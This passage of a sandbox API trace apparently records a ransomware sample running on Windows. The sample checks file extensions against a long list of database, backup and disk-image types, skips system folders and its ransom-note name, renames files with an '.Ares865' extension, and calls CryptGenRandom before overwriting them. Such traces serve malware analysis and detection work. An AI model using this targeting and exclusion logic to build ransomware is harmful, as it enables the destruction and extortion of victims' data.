lpString2="te") returned -1 [0087.921] lstrlenW (lpString="teacher") returned 7 [0087.921] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0087.921] lstrlenW (lpString="tmd") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0087.921] lstrlenW (lpString="tps") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0087.921] lstrlenW (lpString="trc") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.921] lstrlenW (lpString="trc") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0087.921] lstrlenW (lpString="trm") returned 3 [0087.921] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0087.921] lstrlenW (lpString="udb") returned 3 [0087.922] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0087.922] lstrlenW (lpString="udl") returned 3 [0087.922] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0087.922] lstrlenW (lpString="usr") returned 3 [0087.922] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0087.922] lstrlenW (lpString="v12") returned 3 [0087.922] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0087.922] lstrlenW (lpString="vis") returned 3 [0087.922] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0087.922] lstrlenW (lpString="vpd") returned 3 [0087.922] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0087.922] lstrlenW (lpString="vvv") returned 3 [0087.922] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0087.922] lstrlenW (lpString="wdb") returned 3 [0087.922] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0087.922] lstrlenW (lpString="wmdb") returned 4 [0087.922] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0087.922] lstrlenW (lpString="wrk") returned 3 [0087.922] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0087.922] lstrlenW (lpString="xdb") returned 3 [0087.922] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0087.922] lstrlenW (lpString="xld") returned 3 [0087.922] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0087.922] lstrlenW (lpString="xmlff") returned 5 [0087.922] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0087.922] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.Ares865") returned 78 [0087.922] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0087.923] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0087.923] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31584) returned 1 [0087.923] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0087.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0087.924] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0087.924] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0087.924] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0087.924] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.925] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e60, lpName=0x0) returned 0x15c [0087.929] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e60) returned 0x190000 [0087.937] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0087.938] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0087.938] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0087.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0087.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0087.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0087.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0087.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0087.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0087.938] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0087.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0087.938] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0087.938] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0087.938] CloseHandle (hObject=0x15c) returned 1 [0087.939] CloseHandle (hObject=0x118) returned 1 [0087.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0087.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0087.939] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7337cc00, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7337cc00, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x3fb60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ONINTL.REST.trx_dll", cAlternateFileName="ONINTL~2.TRX")) returned 1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2=".") returned 1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="..") returned 1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="windows") returned -1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="bootmgr") returned 1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="temp") returned -1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="pagefile.sys") returned -1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="boot") returned 1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="ids.txt") returned 1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="perflogs") returned -1 [0087.939] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="MSBuild") returned 1 [0087.939] lstrlenW (lpString="ONINTL.REST.trx_dll") returned 19 [0087.939] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll") returned 70 [0087.939] lstrcpyW (in: lpString1=0x2cce468, lpString2="ONINTL.REST.trx_dll" | out: lpString1="ONINTL.REST.trx_dll") returned="ONINTL.REST.trx_dll" [0087.939] lstrlenW (lpString="ONINTL.REST.trx_dll") returned 19 [0087.939] lstrlenW (lpString="Ares865") returned 7 [0087.939] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0087.939] lstrlenW (lpString=".dll") returned 4 [0087.940] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2=".dll") returned 1 [0087.940] lstrlenW (lpString=".lnk") returned 4 [0087.940] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2=".lnk") returned 1 [0087.940] lstrlenW (lpString=".ini") returned 4 [0087.940] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2=".ini") returned 1 [0087.940] lstrlenW (lpString=".sys") returned 4 [0087.940] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2=".sys") returned 1 [0087.940] lstrlenW (lpString="ONINTL.REST.trx_dll") returned 19 [0087.940] lstrlenW (lpString="bak") returned 3 [0087.940] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0087.940] lstrlenW (lpString="ba_") returned 3 [0087.940] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0087.940] lstrlenW (lpString="dbb") returned 3 [0087.940] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0087.940] lstrlenW (lpString="vmdk") returned 4 [0087.940] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0087.940] lstrlenW (lpString="rar") returned 3 [0087.940] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0087.940] lstrlenW (lpString="zip") returned 3 [0087.940] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0087.940] lstrlenW (lpString="tgz") returned 3 [0087.940] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0087.940] lstrlenW (lpString="vbox") returned 4 [0087.940] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0087.940] lstrlenW (lpString="vdi") returned 3 [0087.940] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0087.940] lstrlenW (lpString="vhd") returned 3 [0087.940] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0087.940] lstrlenW (lpString="vhdx") returned 4 [0087.940] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0087.940] lstrlenW (lpString="avhd") returned 4 [0087.940] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0087.940] lstrlenW (lpString="db") returned 2 [0087.940] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0087.940] lstrlenW (lpString="db2") returned 3 [0087.940] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0087.940] lstrlenW (lpString="db3") returned 3 [0087.940] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0087.941] lstrlenW (lpString="dbf") returned 3 [0087.941] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0087.941] lstrlenW (lpString="mdf") returned 3 [0087.941] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0087.941] lstrlenW (lpString="mdb") returned 3 [0087.941] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0087.941] lstrlenW (lpString="sql") returned 3 [0087.941] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0087.941] lstrlenW (lpString="sqlite") returned 6 [0087.941] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0087.941] lstrlenW (lpString="sqlite3") returned 7 [0087.941] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0087.941] lstrlenW (lpString="sqlitedb") returned 8 [0087.941] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0087.941] lstrlenW (lpString="xml") returned 3 [0087.941] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0087.941] lstrlenW (lpString="$er") returned 3 [0087.941] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0087.941] lstrlenW (lpString="4dd") returned 3 [0087.941] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0087.941] lstrlenW (lpString="4dl") returned 3 [0087.941] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0087.941] lstrlenW (lpString="^^^") returned 3 [0087.941] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0087.941] lstrlenW (lpString="abs") returned 3 [0087.941] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0087.941] lstrlenW (lpString="abx") returned 3 [0087.941] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0087.941] lstrlenW (lpString="accdb") returned 5 [0087.941] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0087.941] lstrlenW (lpString="accdc") returned 5 [0087.941] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0087.941] lstrlenW (lpString="accde") returned 5 [0087.941] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0087.941] lstrlenW (lpString="accdr") returned 5 [0087.941] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0087.941] lstrlenW (lpString="accdt") returned 5 [0087.941] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0087.942] lstrlenW (lpString="accdw") returned 5 [0087.942] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0087.942] lstrlenW (lpString="accft") returned 5 [0087.942] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0087.942] lstrlenW (lpString="adb") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.942] lstrlenW (lpString="adb") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0087.942] lstrlenW (lpString="ade") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0087.942] lstrlenW (lpString="adf") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0087.942] lstrlenW (lpString="adn") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0087.942] lstrlenW (lpString="adp") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0087.942] lstrlenW (lpString="alf") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0087.942] lstrlenW (lpString="ask") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0087.942] lstrlenW (lpString="btr") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0087.942] lstrlenW (lpString="cat") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0087.942] lstrlenW (lpString="cdb") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0087.942] lstrlenW (lpString="ckp") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0087.942] lstrlenW (lpString="cma") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0087.942] lstrlenW (lpString="cpd") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0087.942] lstrlenW (lpString="dacpac") returned 6 [0087.942] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0087.942] lstrlenW (lpString="dad") returned 3 [0087.942] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0087.942] lstrlenW (lpString="dadiagrams") returned 10 [0087.943] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0087.943] lstrlenW (lpString="daschema") returned 8 [0087.943] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0087.943] lstrlenW (lpString="db-journal") returned 10 [0087.943] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0087.943] lstrlenW (lpString="db-shm") returned 6 [0087.943] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0087.943] lstrlenW (lpString="db-wal") returned 6 [0087.943] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0087.943] lstrlenW (lpString="dbc") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0087.943] lstrlenW (lpString="dbs") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0087.943] lstrlenW (lpString="dbt") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0087.943] lstrlenW (lpString="dbv") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0087.943] lstrlenW (lpString="dbx") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0087.943] lstrlenW (lpString="dcb") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0087.943] lstrlenW (lpString="dct") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0087.943] lstrlenW (lpString="dcx") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0087.943] lstrlenW (lpString="ddl") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0087.943] lstrlenW (lpString="dlis") returned 4 [0087.943] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0087.943] lstrlenW (lpString="dp1") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0087.943] lstrlenW (lpString="dqy") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0087.943] lstrlenW (lpString="dsk") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0087.943] lstrlenW (lpString="dsn") returned 3 [0087.943] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0087.943] lstrlenW (lpString="dtsx") returned 4 [0087.944] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0087.944] lstrlenW (lpString="dxl") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0087.944] lstrlenW (lpString="eco") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0087.944] lstrlenW (lpString="ecx") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0087.944] lstrlenW (lpString="edb") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0087.944] lstrlenW (lpString="epim") returned 4 [0087.944] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0087.944] lstrlenW (lpString="fcd") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0087.944] lstrlenW (lpString="fdb") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0087.944] lstrlenW (lpString="fic") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0087.944] lstrlenW (lpString="flexolibrary") returned 12 [0087.944] lstrcmpiW (lpString1="REST.trx_dll", lpString2="flexolibrary") returned 1 [0087.944] lstrlenW (lpString="fm5") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0087.944] lstrlenW (lpString="fmp") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0087.944] lstrlenW (lpString="fmp12") returned 5 [0087.944] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0087.944] lstrlenW (lpString="fmpsl") returned 5 [0087.944] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0087.944] lstrlenW (lpString="fol") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0087.944] lstrlenW (lpString="fp3") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0087.944] lstrlenW (lpString="fp4") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0087.944] lstrlenW (lpString="fp5") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0087.944] lstrlenW (lpString="fp7") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0087.944] lstrlenW (lpString="fpt") returned 3 [0087.944] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0087.945] lstrlenW (lpString="frm") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0087.945] lstrlenW (lpString="gdb") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.945] lstrlenW (lpString="gdb") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0087.945] lstrlenW (lpString="grdb") returned 4 [0087.945] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0087.945] lstrlenW (lpString="gwi") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0087.945] lstrlenW (lpString="hdb") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0087.945] lstrlenW (lpString="his") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0087.945] lstrlenW (lpString="ib") returned 2 [0087.945] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0087.945] lstrlenW (lpString="idb") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0087.945] lstrlenW (lpString="ihx") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0087.945] lstrlenW (lpString="itdb") returned 4 [0087.945] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0087.945] lstrlenW (lpString="itw") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0087.945] lstrlenW (lpString="jet") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0087.945] lstrlenW (lpString="jtx") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0087.945] lstrlenW (lpString="kdb") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0087.945] lstrlenW (lpString="kexi") returned 4 [0087.945] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0087.945] lstrlenW (lpString="kexic") returned 5 [0087.945] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0087.945] lstrlenW (lpString="kexis") returned 5 [0087.945] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0087.945] lstrlenW (lpString="lgc") returned 3 [0087.945] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0087.946] lstrlenW (lpString="lwx") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0087.946] lstrlenW (lpString="maf") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0087.946] lstrlenW (lpString="maq") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0087.946] lstrlenW (lpString="mar") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0087.946] lstrlenW (lpString="marshal") returned 7 [0087.946] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0087.946] lstrlenW (lpString="mas") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0087.946] lstrlenW (lpString="mav") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0087.946] lstrlenW (lpString="maw") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0087.946] lstrlenW (lpString="mdbhtml") returned 7 [0087.946] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0087.946] lstrlenW (lpString="mdn") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0087.946] lstrlenW (lpString="mdt") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0087.946] lstrlenW (lpString="mfd") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0087.946] lstrlenW (lpString="mpd") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0087.946] lstrlenW (lpString="mrg") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0087.946] lstrlenW (lpString="mud") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0087.946] lstrlenW (lpString="mwb") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0087.946] lstrlenW (lpString="myd") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0087.946] lstrlenW (lpString="ndf") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0087.946] lstrlenW (lpString="nnt") returned 3 [0087.946] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0087.947] lstrlenW (lpString="nrmlib") returned 6 [0087.947] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0087.947] lstrlenW (lpString="ns2") returned 3 [0087.947] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0087.947] lstrlenW (lpString="ns3") returned 3 [0087.947] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0087.947] lstrlenW (lpString="ns4") returned 3 [0087.947] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0087.947] lstrlenW (lpString="nsf") returned 3 [0087.947] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0087.947] lstrlenW (lpString="nv") returned 2 [0087.947] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0087.947] lstrlenW (lpString="nv2") returned 3 [0087.947] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0087.947] lstrlenW (lpString="nwdb") returned 4 [0087.947] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0087.947] lstrlenW (lpString="nyf") returned 3 [0087.947] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0087.947] lstrlenW (lpString="odb") returned 3 [0087.947] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.947] lstrlenW (lpString="odb") returned 3 [0087.947] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0087.947] lstrlenW (lpString="oqy") returned 3 [0087.947] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0087.947] lstrlenW (lpString="ora") returned 3 [0087.947] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0087.947] lstrlenW (lpString="orx") returned 3 [0087.947] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0087.948] lstrlenW (lpString="owc") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0087.948] lstrlenW (lpString="p96") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0087.948] lstrlenW (lpString="p97") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0087.948] lstrlenW (lpString="pan") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0087.948] lstrlenW (lpString="pdb") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0087.948] lstrlenW (lpString="pdm") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0087.948] lstrlenW (lpString="pnz") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0087.948] lstrlenW (lpString="qry") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0087.948] lstrlenW (lpString="qvd") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0087.948] lstrlenW (lpString="rbf") returned 3 [0087.948] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0087.948] lstrlenW (lpString="rctd") returned 4 [0087.948] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0087.948] lstrlenW 